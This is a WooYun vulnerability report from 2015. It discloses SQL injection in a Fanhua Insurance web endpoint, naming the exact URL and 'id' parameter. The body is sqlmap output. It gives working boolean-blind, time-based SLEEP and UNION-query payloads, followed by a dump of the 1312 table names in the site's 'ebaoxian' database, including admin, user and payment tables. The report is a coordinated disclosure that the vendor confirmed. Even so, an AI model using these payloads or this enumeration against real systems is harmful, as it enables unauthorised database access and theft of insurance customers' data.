当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0163255

漏洞标题:泛华保险主站存在SQL注入漏洞可UNION查询

相关厂商:泛华保险服务集团

漏洞作者: 路人甲

提交时间:2015-12-21 19:04

修复时间:2016-02-07 17:56

公开时间:2016-02-07 17:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-21: 细节已通知厂商并且等待厂商处理中
2015-12-24: 厂商已经确认,细节仅向厂商公开
2016-01-03: 细节向核心白帽子及相关领域专家公开
2016-01-13: 细节向普通白帽子公开
2016-01-23: 细节向实习白帽子公开
2016-02-07: 细节向公众公开

简要描述:

泛华保险主站存在SQL注入漏洞可UNION查询

详细说明:

http://www.cninsure.net/touzizhe/shop/member!queryfujian.action?id=264004

QQ图片20151221185501.png


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=264004' AND 9863=9863 AND 'QkzE'='QkzE
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=264004' AND (SELECT * FROM (SELECT(SLEEP(5)))QyuF) AND 'WlCs'='WlCs
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-7399' UNION ALL SELECT 97,97,CONCAT(0x71786b7171,0x42746c69676a4d484677,0x7162767071),97--
---
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
Database: ebaoxian
[1312 tables]
+--------------------------------+
| user |
| admin |
| admin_role |
| agreement |
| allxmltotab |
| area |
| area_copy |
| article |
| article_channel |
| articlecategory |
| articlecategory_channel |
| articlehome |
| baoxian |
| bindinfoforlogin |
| bpsuggestion |
| bpuserscores |
| brand |
| bw |
| bw_faagenttree |
| bzcadmingroup |
| bzcadposition |
| bzcadvertisement |
| bzcadvisitlog |
| bzcanswer |
| bzcanswercomment |
| bzcapply |
| bzcapproval |
| bzcarticle |
| bzcarticlelog |
| bzcarticlepage |
| bzcarticlevisitlog |
| bzcattachment |
| bzcattachmentrela |
| bzcaudio |
| bzcaudiorela |
| bzcauthor |
| bzcbadword |
| bzcboardmessage |
| bzccatalog |
| bzccatalogconfig |
| bzccomment |
| bzccontribute |
| bzccustomtable |
| bzccustomtablecolumn |
| bzcdatabase |
| bzcdbgather |
| bzcdeployconfig |
| bzcdeployjob |
| bzcdeploylog |
| bzcforum |
| bzcforumattachment |
| bzcforumconfig |
| bzcforumgroup |
| bzcforummember |
| bzcforumscore |
| bzcfulltext |
| bzcimage |
| bzcimageplayer |
| bzcimagerela |
| bzcinnerdeploy |
| bzcinnergather |
| bzcjsfile |
| bzckeyword |
| bzckeywordtype |
| bzclink |
| bzclinkgroup |
| bzcmagazine |
| bzcmagazinecatalogrela |
| bzcmagazineissue |
| bzcmessage |
| bzcmessageboard |
| bzcnotes |
| bzcpageblock |
| bzcpageblockitem |
| bzcpaper |
| bzcpaperissue |
| bzcpaperpage |
| bzcpaperpagenewsrela |
| bzcpost |
| bzcquestion |
| bzcquestiongroup |
| bzcsite |
| bzcstatitem |
| bzctag |
| bzctemplate |
| bzctemplateblockrela |
| bzctemplatetagrela |
| bzctheme |
| bzcvideo |
| bzcvideorela |
| bzcvisitlog |
| bzcvote |
| bzcvoteitem |
| bzcvotelog |
| bzcvotesubject |
| bzcwebgather |
| bzdbranch |
| bzdcode |
| bzdcolumn |
| bzdcolumnrela |
| bzdcolumnvalue |
| bzdconfig |
| bzddistrict |
| bzdfavorite |
| bzdhelpitem |
| bzdip |
| bzdiprange |
| bzdmaxno |
| bzdmember |
| bzdmemberaddr |
| bzdmembercompanyinfo |
| bzdmemberfield |
| bzdmemberlevel |
| bzdmemberpersoninfo |
| bzdmenu |
| bzdprivilege |
| bzdrole |
| bzdschedule |
| bzduser |
| bzduserlog |
| bzduserrole |
| bzsbrand |
| bzsfavorite |
| bzsgoods |
| bzsorder |
| bzsorderitem |
| bzspayment |
| bzspaymentprop |
| bzssend |
| bzsshopconfig |
| bzsstore |
| bzwinstance |
| bzwstep |
| bzwworkflow |
| callcenter_user |
| carmenu |
| carrateinformation |
| cartitem |
| channel |
| channelcosts |
| city |
| code |
| couponinfo |
| covershow |
| cpa |
| cps |
| cresource |
| customerdemand |
| deliverycorp |
| deliveryitem |
| deliverytype |
| deposit |
| dialogstatistics |
| dict |
| dictionary |
| dtt0088 |
| dtt0089 |
| dtt0090 |
| dtt0093 |
| dtt0094 |
| dtt0096 |
| dtt0097 |
| dtt0098 |
| dtt0099 |
| dtt0100 |
| dtt0101 |
| dtt0102 |
| dtt0103 |
| dtt0104 |
| dtt0105 |
| dtt0106 |
| dtt0107 |
| dtt0108 |
| dtt0109 |
| dtt0110 |
| dtt0111 |
| dtt0112 |
| dtt0113 |
| dtt0114 |
| dtt0115 |
| dtt0119 |
| dtt0120 |
| dtt0121 |
| dtt0122 |
| dtt0123 |
| dtt0124 |
| dtt0125 |
| dtt0126 |
| dtt0127 |
| dtt0128 |
| dtt0129 |
| dtt0130 |
| dtt0132 |
| dtt0133 |
| dtt0135 |
| dtt0137 |
| dtt0139 |
| dtt0140 |
| dtt0141 |
| dtt0142 |
| dtt0158 |
| dtt0160 |
| dtt0161 |
| dtt0165 |
| dtt0166 |
| dtt0167 |
| dtt0168 |
| dtt0169 |
| dtt0170 |
| dtt0171 |
| dtt0172 |
| dtt0173 |
| dtt0174 |
| dtt0175 |
| dtt0176 |
| dtt0177 |
| dtt0178 |
| dtt0179 |
| dtt0180 |
| dtt0182 |
| dtt0183 |
| dtt0184 |
| dtt0185 |
| dtt0186 |
| dtt0187 |
| dtt0188 |
| dtt0189 |
| dtt0191 |
| dtt0192 |
| dtt0193 |
| dtt0194 |
| dtt0195 |
| dtt0196 |
| dtt0197 |
| dtt0198 |
| dtt0199 |
| dtt0200 |
| dtt0201 |
| dtt0202 |
| dtt0206 |
| dtt0208 |
| dtt0209 |
| dtt0210 |
| dtt0211 |
| dtt0212 |
| dtt0213 |
| dtt0214 |
| dtt0215 |
| dtt0216 |
| dtt0217 |
| dtt0218 |
| dtt0219 |
| dtt0222 |
| dtt0223 |
| dtt0224 |
| dtt0225 |
| dtt0226 |
| dtt0227 |
| dtt0231 |
| dtt0232 |
| dtt0233 |
| dtt0234 |
| dtt0235 |
| dtt0236 |
| dtt0237 |
| dtt0238 |
| dtt0239 |
| dtt0240 |
| dtt0241 |
| dtt0242 |
| dtt0243 |
| dtt0244 |
| dtt0245 |
| dtt0246 |
| dtt0247 |
| dtt0248 |
| dtt0249 |
| dtt0250 |
| dtt0251 |
| dtt0252 |
| dtt0253 |
| dtt0254 |
| dtt0255 |
| dtt0256 |
| dtt0257 |
| dtt0258 |
| dtt0259 |
| dtt0260 |
| dtt0261 |
| dtt0262 |
| dtt0263 |
| dtt0264 |
| dtt0265 |
| dtt0266 |
| dtt0267 |
| dtt0268 |
| dtt0269 |
| dtt0270 |
| dtt0271 |
| dtt0272 |
| dtt0273 |
| dtt0274 |
| dtt0276 |
| dtt0277 |
| dtt0278 |
| dtt0279 |
| dtt0280 |
| dtt0281 |
| dtt0282 |
| dtt0283 |
| dtt0284 |
| dtt0285 |
| dtt0286 |
| dtt0287 |
| dtt0288 |
| dtt0289 |
| dtt0290 |
| dtt0291 |
| dtt0292 |
| dtt0293 |
| dtt0294 |
| faaccounts |
| faaddextends |
| faagent |
| faagentalteration |
| faagentamonth |
| faagentassist |
| faagentauthor |
| faagentb |
| faagentblacklist |
| faagentblacklisttrack |
| faagentchange |
| faagentgracorp |
| faagentgracorpb |
| faagentgrade |
| faagentmonth |
| faagentmonths |
| faagentmonthstatistic |
| faalterposapp |
| faannuity |
| faascription |
| faassess |
| faassessb |
| faassessfieldtoname |
| faassessindex |
| faassessmain |
| faassessperiod |
| faassessradix |
| faauthorize |
| faauthorizeb |
| fabasiclawtype |
| fabusitaxrate |
| facannualtax |
| facasedescribe |
| faccardevice |
| faccardriver |
| faccartax |
| facclaim |
| faccont |
| facderate |
| facengage |
| facertification |
| facitemcar |
| facmasthead |
| facode |
| facommirate |
| facommirateb |
| facommision |
| facommision2 |
| facommisionb |
| facommisiondetail |
| facpecc |
| facpol |
| facprofit |
| facrequestresult |
| facriskkind |
| facriskkindmap |
| facriskmap |
| factaxrate |
| fadeposit |
| fadimcont |
| fadimission |
| faensure |
| fafancecommirate |
| fafccontextends |
| faflacmain |
| fafortuneradix |
| fagraderela |
| faindexinfo |
| faindexinfotemp |
| faindexvsassess |
| faindexvsassessaccessory |
| faindexvsbase |
| faindexvscomm |
| famanoeuvre |
| faorphanpolicy |
| faplan |
| fapreholdetail |
| fapresenceandhols |
| fapubang |
| faqualityassess |
| faqualityitemdef |
| farelateliab |
| farelation |
| farelationb |
| farelationmonth |
| farewardpunish |
| farewardpunishitem |
| farewardpunishitemb |
| farightdetail |
| farights |
| farightsb |
| farightsbatch |
| farightscarddetail |
| farightscardgather |
| fascore |
| fascorechange |
| fastandprem |
| fasurveyagentdetail |
| fasurveycommidetail |
| fasurveyrate |
| fasurveyrateb |
| fatax |
| fatrain |
| fatree |
| fatreeamonth |
| fatreeb |
| fatreemonth |
| fatreemonths |
| fawage |
| fawagebase |
| fawagecont |
| fawagedetail |
| fawagefieldtoname |
| fawagelog |
| fawageradix |
| fawagevehicle |
| fawagevehicleitem |
| fawarrantor |
| fawarrantorb |
| fawexperience |
| fbpol |
| fbpolfeegrade |
| fcappnt |
| fcappntaffix |
| fcauthorize |
| fcbidinfo |
| fcbidins |
| fcbnf |
| fccardcont |
| fccardcontb |
| fccheckresultlist |
| fccont |
| fccontagent |
| fccontagentb |
| fccontfull |
| fccontin |
| fccontlend |
| fccontnote |
| fccontplan |
| fccontplanrisk |
| fccontprem |
| fcconttemp |
| fccounteracttrack |
| fcdoc |
| fcdocb |
| fcduty |
| fcexam |
| fcextendadvance |
| fcextendadvancedetail |
| fcfilesmove |
| fcfilesmovedetail |
| fcgetbidsub |
| fcgother |
| fcgotherexamtrack |
| fcgrpappnt |
| fcgrpcont |
| fcgrpimportlog |
| fcgrppol |
| fcinsured |
| fcinsuredtemp |
| fcinvestacc |
| fcirate |
| fcirate2 |
| fcitemaccident |
| fcitemagri |
| fcitemcar |
| fcitemcargo |
| fcitemconstruct |
| fcitemcredit |
| fcitemdevice |
| fcitemhouse |
| fciteminvest |
| fcitemkind |
| fcitemliab |
| fcitemloan |
| fcitemmain |
| fcitemprop |
| fcitemship |
| fcmovebatchfiles |
| fcorder |
| fcpgappnt |
| fcpginsured |
| fcpol |
| fcprojauthor |
| fcprojbillexamtrack |
| fcprojcheck |
| fcprojcooper |
| fcprojexamtrack |
| fcprojmain |
| fcprojpeop |
| fcprojrisk |
| fcprojriskclt |
| fcprojriskins |
| fcprojservlog |
| fcprotocoldocument |
| fcrelationes |
| fcrenewchk |
| fcrenewchkdetail |
| fcrenewchkresult |
| fcretrack |
| fcsupplierlist |
| fcunuslflowexamtrack |
| fcunuslflowmain |
| fcunuslflowsub |
| fdaddress |
| fdagentcardcount |
| fdbainianno |
| fdbroadcast |
| fdchannel |
| fdchannelrela |
| fdclaimlimitset |
| fdcode |
| fdcoderela |
| fdcom |
| fdcorpclienttype |
| fdcusaccount |
| fdcusassign |
| fdcustobjectaccident |
| fdcustobjectagri |
| fdcustobjectcar |
| fdcustobjectcargo |
| fdcustobjectconstruct |
| fdcustobjectcredit |
| fdcustobjectdevice |
| fdcustobjecthouse |
| fdcustobjectinvest |
| fdcustobjectliab |
| fdcustobjectloan |
| fdcustobjectprop |
| fdcustobjectship |
| fdcustomerback |
| fdcustomereditinfo |
| fddocroot |
| fdeditdefine |
| fdgroup |
| fdgrouppre |
| fdgrpaddress |
| fdinscom |
| fdinscontno |
| fdlendlimitset |
| fdlendmaxlimitset |
| fdlock |
| fdmaxno |
| fdmenu |
| fdmenugrp |
| fdmenugrptomenu |
| fdoccualludesupplier |
| fdoccupation |
| fdperson |
| fdpersonaddress |
| fdpersonpre |
| fdpwdhistory |
| fdpwdpolicy |
| fdrepairshop |
| fdrepairshoptocom |
| fdsettledefine |
| fdsysvar |
| fdtask |
| fdtasklog |
| fdtaskparam |
| fdtaskplan |
| fdtaskrunlog |
| fdtaskserver |
| fduser |
| fdusercom |
| fdusercontrol |
| fduserlog |
| fduserlogin |
| fdusertomenugrp |
| fee |
| feedetail |
| feedetail_copy |
| fehealthyinfo |
| fehealthyinfob |
| femcalmode |
| femcalmodeb |
| femcarbaseinfoinpub |
| femcarbaseinfoinput |
| femcarfeecalinfo |
| femcarfeecalinfob |
| femcarkindplan |
| femcarkindplanb |
| femcarriskinfo |
| femcarriskinfob |
| femcommend |
| femcommendb |
| femcompareinfoset |
| femcompareinfosetb |
| femdutyamntpremlist |
| femdutyamntpremlistb |
| femdutyfactor |
| femdutyfactorb |
| femdutykindfacotorrela |
| femproductrelacondition |
| femrisk |
| femriskb |
| femriskbrightspotlist |
| femriskbrightspotlistb |
| femriskcompareproperties |
| femriskcomparepropertiesb |
| femriskfactorlist |
| femriskfactorlistb |
| femriskfactorrela |
| femriskfactorrelab |
| femriskpaylist |
| femriskpaylistb |
| femriskpaytypeset |
| femriskpaytypesetb |
| femrisksalearea |
| femrisksaleareab |
| femrisktype |
| femrisktypeb |
| femsearchconditioninfo |
| femsearchinfoset |
| femsearchinfosetb |
| femsearchinnerlib |
| femsearchinnerlibb |
| femsearchproperties |
| femsearchpropertiesb |
| femsearchrela |
| femsearchrelab |
| femsearchrelabatch |
| femsearchrelalist |
| femsupportkindspeoplelist |
| femsupportkindspeoplelistb |
| feriskappfactor |
| feriskappfactorb |
| feuiinfo |
| feuiinfob |
| feuiinfovalue |
| feuiinfovalueb |
| fiaboriginaldata |
| fidatadistilledinfo |
| fjaget |
| fjagetagent |
| fjagetbranch |
| fjagetcustomer |
| fjagetduty |
| fjagetpartner |
| fjagetsupplier |
| fjagettempfee |
| fjapay |
| fjapayagent |
| fjapaybranch |
| fjapaycustomer |
| fjapayduty |
| fjapaypartner |
| fjapaysupplier |
| fjbankaccount |
| fjbget |
| fjbgetagent |
| fjbgetbranch |
| fjbgetcustomer |
| fjbgetpartner |
| fjbgetsupplier |
| fjbgettempfee |
| fjbpay |
| fjbpayagent |
| fjbpaybranch |
| fjbpaycustomer |
| fjbpaypartner |
| fjbpaysupplier |
| fjfiget |
| fjfigetclass |
| fjpreparationacc |
| fjpreparationacctr |
| fjsget |
| fjsgetagent |
| fjsgetbranch |
| fjsgetcustomer |
| fjsgetpartner |
| fjsgetsupplier |
| fjsgettempfee |
| fjspay |
| fjspayagent |
| fjspaybranch |
| fjspaycustomer |
| fjspaycustomertemp |
| fjspaypartner |
| fjspayposinfo |
| fjspaysupplier |
| fjspaytemp |
| fjtempfee |
| fjtempfeeclass |
| flbasefield |
| flbasefieldb |
| flbnf |
| flcase |
| flcaseacc |
| flcasebacktrack |
| flcasedocroot |
| flcasedocument |
| flcaseindfee |
| flcaselog |
| flcasenote |
| flcasepolicy |
| flcaserela |
| flcasesurveyinfo |
| flclaim |
| flclaimaccount |
| flclaimdecline |
| flclaimpolicy |
| flcomlimitset |
| flcustomerpreclaim |
| flindirectfee |
| flinqapply |
| flinqfee |
| flinqfeesta |
| fllossconfirminfo |
| fllossconfirminfolist |
| flmaffix |
| flmappreasonaffix |
| flmriskrate |
| flmriskrateb |
| flmscheratecalfactorlib |
| flmscheratecalfactorlibb |
| flnocont |
| flrepairshoplossresult |
| flrepairshoplossresultbak |
| flrepairshoppreclaim |
| flreport |
| flreportaffix |
| flreportreason |
| flreportrela |
| flsubreport |
| flsurvey |
| flsurveyrela |
| flsurveyresult |
| flthirdinfo |
| fmaccount |
| fmbrkkind |
| fmbrkrisk |
| fmcalfactor |
| fmcalmode |
| fmcardrisk |
| fmcertifydes |
| fmcheckfield |
| fmcomfirmget |
| fmduty |
| fmdutyamntlist |
| fmdutyamntlistb |
| fmdutyb |
| fmdutyrelation |
| fmdutyrelationb |
| fmedoritem |
| fmestateagentfeerate |
| fmestateagentfeerateb |
| fmindex |
| fmitem |
| fmitemdetail |
| fmkind |
| fmkindb |
| fmmessagesfeerate |
| fmplan |
| fmplanrisk |
| fmpropratebatch |
| fmpropratetem |
| fmprotocol |
| fmprotocolb |
| fmprotocolcalitem |
| fmprotocolcalitemdefine |
| fmprotocolcontfeerate |
| fmprotocolcontinueconf |
| fmprotocolcontinueconfdefine |
| fmprotocoldefine |
| fmprotocolfeerate |
| fmprotocolfeerateb |
| fmprotocolfeeratedefine |
| fmprotocolfeerateexamlog |
| fmprotocolfeeraterela |
| fmprotocolfeesql |
| fmprotocolfeesqlb |
| fmprotocolgrade |
| fmprotocolplan |
| fmprotocolrisk |
| fmprotocolriskb |
| fmrateapprove |
| fmreladutycodelist |
| fmreladutycodelistb |
| fmrisk |
| fmriskaccount |
| fmriskapp |
| fmriskb |
| fmriskcopyconfig |
| fmriskduty |
| fmriskfactor |
| fmriskitemdetail |
| fmriskpayintv |
| fmriskpayperiod |
| fmriskrate |
| fmriskratetemp |
| fmrisksale |
| fmrisktype |
| fmrisktypeb |
| fmriskyear |
| fmsetpolrate |
| footer |
| fpappnt |
| fpbnf |
| fpcont |
| fpcontagent |
| fpcontlend |
| fpcontnote |
| fpcontplan |
| fpcontplanrisk |
| fpcusaccount |
| fpcusassign |
| fpduty |
| fpedorapp |
| fpedoritem |
| fpedormain |
| fpedortype |
| fpgroup |
| fpgrouppre |
| fpgrpaddress |
| fpgrpappnt |
| fpgrpcont |
| fpgrpedoritem |
| fpgrpedormain |
| fpgrpedortype |
| fpgrppol |
| fpinsured |
| fpinvestacc |
| fpitemaccident |
| fpitemagri |
| fpitemcar |
| fpitemcargo |
| fpitemconstruct |
| fpitemcredit |
| fpitemdevice |
| fpitemhouse |
| fpiteminvest |
| fpitemkind |
| fpitemliab |
| fpitemloan |
| fpitemmain |
| fpitemprop |
| fpitemship |
| fpperson |
| fppersonaddress |
| fppersonpre |
| fppgappnt |
| fppginsured |
| fppol |
| fpuapresenceandhols |
| friendlink |
| fsbatch |
| fsbatchb |
| fsbatchrela |
| fsbatchrisk |
| fsbinsurefeesum |
| fscheckinfo |
| fsestateotherprem |
| fsestateotherrela |
| fsestatesetotherprem |
| fsfeeprem |
| fsinsurechk |
| fsinsurechkdetail |
| fsinsurecycle |
| fsinsureerr |
| fsinsurefeesum |
| fsinsureotherfeerate |
| fsinsurepolfeeclass |
| fsinsureprem |
| fsinsurepremb |
| fsotherfeesum |
| fspartner |
| fspartnerbat |
| fsprembatch |
| fsriskrate |
| fssettleprem |
| fundsdetail |
| fundsflow |
| fxfailmsg |
| fxquerycondition |
| fxqueryconditiontemplate |
| fxreceiveinfo |
| fxsendinfo |
| fxservice |
| fxserviceinteract |
| fxservicequery |
| fxservicetomap |
| fxservicevariable |
| fzcard |
| fzcardb |
| fzcardcontrol |
| fzcardmap |
| fzcardnocontrast |
| fzcardplan |
| fzcardprint |
| fzcardstate |
| fzcardtemp |
| fzcardtrack |
| galog |
| gift |
| giftattribute |
| giftcalfactor |
| giftcalrule |
| giftinsattribute |
| giftinstype |
| giftrate |
| gifttype |
| healthyinfo |
| information |
| informationappnt |
| informationbnf |
| informationduty |
| informationinsured |
| informationinsuredelements |
| informationitemcargo |
| informationitemhouse |
| informationitemmain |
| informationitemprop |
| informationrisktype |
| insurance |
| insurance_test_result |
| insurance_test_user |
| insuredcompanyreturndata |
| insuredhealth |
| ipseeker |
| jdaddress |
| jdagencymaxno |
| jdcode |
| jdcom |
| jdgrouppre |
| jdinsurespecialno |
| jdmaxno |
| jdmenu |
| jdmenugrp |
| jdmenugrptomenu |
| jdproductc |
| jdpwdpolicy |
| jdriskagencydata |
| jdsysvar |
| jduser |
| jdusercom |
| jduserlog |
| jduserlogin |
| jdusertomenugrp |
| keyword |
| keyword_index |
| lacom |
| lacomtoagent |
| ladert |
| ldcode |
| ldcode1 |
| ldcom |
| ldcombin |
| ldcombinrisk |
| ldmaxno |
| ldmenu |
| ldmenugrp |
| ldmenugrptomenu |
| ldsysvar |
| ldtask |
| ldtaskrunlog |
| lduser |
| ldusertomenugrp |
| limessageinteract |
| limessagesent |
| limessagesentfail |
| limessageservice |
| log |
| logconfig |
| loholiday |
| lotteryact |
| lrbom |
| lrbomitem |
| lrcommand |
| lrruletemplate |
| lrtemplateb |
| lrtemplatet |
| marketingchannels |
| marketingconfig |
| member |
| member_memberattributemapstore |
| member_present |
| member_product |
| memberattribute |
| memberb |
| memberbankcard |
| memberchannel |
| memberdonated |
| memberhobby |
| memberrank |
| memberwallet |
| message |
| mobileversionno |
| moduleelement |
| moduleelementinfo |
| moduleinfo |
| mytrailnonauto |
| navigation |
| occupation |
| orderitem |
| orderlog |
| orderproduct |
| orderremark |
| orders |
| ordersprint |
| pagelayout |
| paybase |
| payment |
| paymentcompany |
| paymentconfig |
| pcmessage |
| pointturnover |
| premiumrate |
| premiumratetemp |
| present |
| presentcategory |
| presentdeliveryitem |
| presentobtain |
| product |
| product_channel |
| product_productattrib |
| product_productinsattrib |
| productattribute |
| productcalfactor |
| productcalrule |
| productcategory |
| productcategory_channel |
| productcollection |
| productconfig |
| productexceltemp |
| productinsattribute |
| productinstype |
| productinstype_attribute |
| productperiod |
| productrate |
| productrateinformation |
| producttempinfo |
| producttotemplate |
| producttype |
| producttypeattributerelation |
| programa |
| pvstatistics |
| questionpaper |
| rate1001 |
| rate1002 |
| ratechannel |
| ratesbase |
| ratesinfo |
| ratesinformation |
| receiptrules |
| receiver |
| redpacketvalidatecode |
| refund |
| refundbase |
| reservation |
| reship |
| role |
| role_cresource |
| ruleresult |
| scanswer |
| scbkedit |
| scbkentry |
| sccatalogtype |
| sccatalogvalue |
| scfaq |
| scquestion |
| scsendemaillog |
| sdaddress |
| sdaddress_copy |
| sdagencyinformation |
| sdallcondtion |
| sdappinsured |
| sdbatchnumber |
| sdcancelreturndata |
| sdcontacts |
| sdcouponinfo |
| sdcouponinfolist |
| sdexpcalendar |
| sdflow |
| sdflowconfig |
| sdgiftinsureconfig |
| sdhistory |
| sdinformation |
| sdinformationappnt |
| sdinformationbatchtemp |
| sdinformationbnf |
| sdinformationduty |
| sdinformationinsured |
| sdinformationinsuredelements |
| sdinformationproperty |
| sdinformationrisktype |
| sdinsuredhealth |
| sdinsuredstatement |
| sdintcalendar |
| sdinteraction |
| sdlx |
| sdmembertoson |
| sdoplog |
| sdorderbatch |
| sdorderitem |
| sdorderitemoth |
| sdorders |
| sdplanconfig |
| sdproduct |
| sdreceipt |
| sdrecommendedregistration |
| sdrecommendmember |
| sdrelationappnt |
| sdsearchaddress |
| sdsearchcache |
| sdsearchproductinfo |
| sdsearchrelaproduct |
| sdsettlebatch |
| sdshortlink |
| sdshortllink |
| sdsmsconfiguration |
| sdtargetinformation |
| sdzipinfo |
| sheet1 |
| shipping |
| showinsurance |
| smsreceipt |
| stock |
| sy_banklocations |
| sy_banks |
| sy_lis_standardareas |
| t_users_tb |
| tabvxml |
| talkstatistics |
| test |
| test123 |
| tradecheckdetail |
| tradecheckresult |
| tradeinformation |
| trailproduct |
| tt |
| user_tb |
| useroperlog |
| users |
| users_tb |
| uvaccessstatistics |
| uwchecklog |
| wapmoduleelement |
| wapmoduleelementinfo |
| wapmoduleinfo |
| wapproducttotemplate |
| wapsdflow |
| wapsdflowconfig |
| withdrawmoney |
| wuhan |
| zca |
| zcadmingroup |
| zcadposition |
| zcadvertisement |
| zcadvisitlog |
| zcanswer |
| zcanswercomment |
| zcapply |
| zcapproval |
| zcarticle |
| zcarticle_ |
| zcarticlelog |
| zcarticlepage |
| zcarticlevisitlog |
| zcattachment |
| zcattachmentrela |
| zcaudio |
| zcaudiorela |
| zcauthor |
| zcbadword |
| zcboardmessage |
| zccatalog |
| zccatalogconfig |
| zccomment |
| zccontribute |
| zccustomtable |
| zccustomtablecolumn |
| zcdatabase |
| zcdbgather |
| zcdeployconfig |
| zcdeployjob |
| zcdeploylog |
| zcforum |
| zcforumattachment |
| zcforumconfig |
| zcforumgroup |
| zcforummember |
| zcforumscore |
| zcfulltext |
| zcimage |
| zcimageplayer |
| zcimagerela |
| zcinnerdeploy |
| zcinnergather |
| zcjsfile |
| zckeyword |
| zckeywordtoproduct |
| zckeywordtoproduct_copy |
| zckeywordtype |
| zclink |
| zclinkgroup |
| zclinkteam |
| zcmagazine |
| zcmagazinecatalogrela |
| zcmagazineissue |
| zcmessage |
| zcmessageboard |
| zcnotes |
| zcpageblock |
| zcpageblockitem |
| zcpaper |
| zcpaperissue |
| zcpaperpage |
| zcpaperpagenewsrela |
| zcpost |
| zcquestion |
| zcquestiongroup |
| zcsite |
| zcstatitem |
| zctag |
| zctemplate |
| zctemplateblockrela |
| zctemplatetagrela |
| zctheme |
| zcvideo |
| zcvideorela |
| zcvisitlog |
| zcvote |
| zcvoteitem |
| zcvotelog |
| zcvotesubject |
| zcwebgather |
| zdactivitycost |
| zdactivitycoupon |
| zdactivitymanager |
| zdactivitymeper |
| zdactivitymessagecontent |
| zdactivitymid |
| zdagencyconfiguration |
| zdbranch |
| zdcardsinglepasswordrecord |
| zdcardsinglestock |
| zdcardsinglestocklocus |
| zdcode |
| zdcolumn |
| zdcolumnrela |
| zdcolumnvalue |
| zdconfig |
| zdcooperationconfig |
| zdcustomerdemand |
| zddistrict |
| zdfavorite |
| zdfeuiinfovalue |
| zdhealthyinfo |
| zdhelpitem |
| zdinstitutions |
| zdinterexp |
| zdip |
| zdiprange |
| zdmaxno |
| zdmember |
| zdmemberaddr |
| zdmembercompanyinfo |
| zdmemberfield |
| zdmemberlevel |
| zdmemberpersoninfo |
| zdmenu |
| zdmetacolumn |
| zdmetacolumngroup |
| zdmetamodel |
| zdmetavalue1 |
| zdmodeltemplate |
| zdoperationlog |
| zdpaymentconfig |
| zdprivilege |
| zdrecordcps |
| zdrole |
| zds |
| zdschedule |
| zdshare |
| zduser |
| zduserlog |
| zduserrole |
| zsbrand |
| zsfavorite |
| zsgoods |
| zsorder |
| zsorderitem |
| zspayment |
| zspaymentprop |
| zssend |
| zsshopconfig |
| zsstore |
| zwinstance |
| zwstep |
| zwworkflow |
+--------------------------------+


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-12-24 18:34

厂商回复:

非常感谢

最新状态:

暂无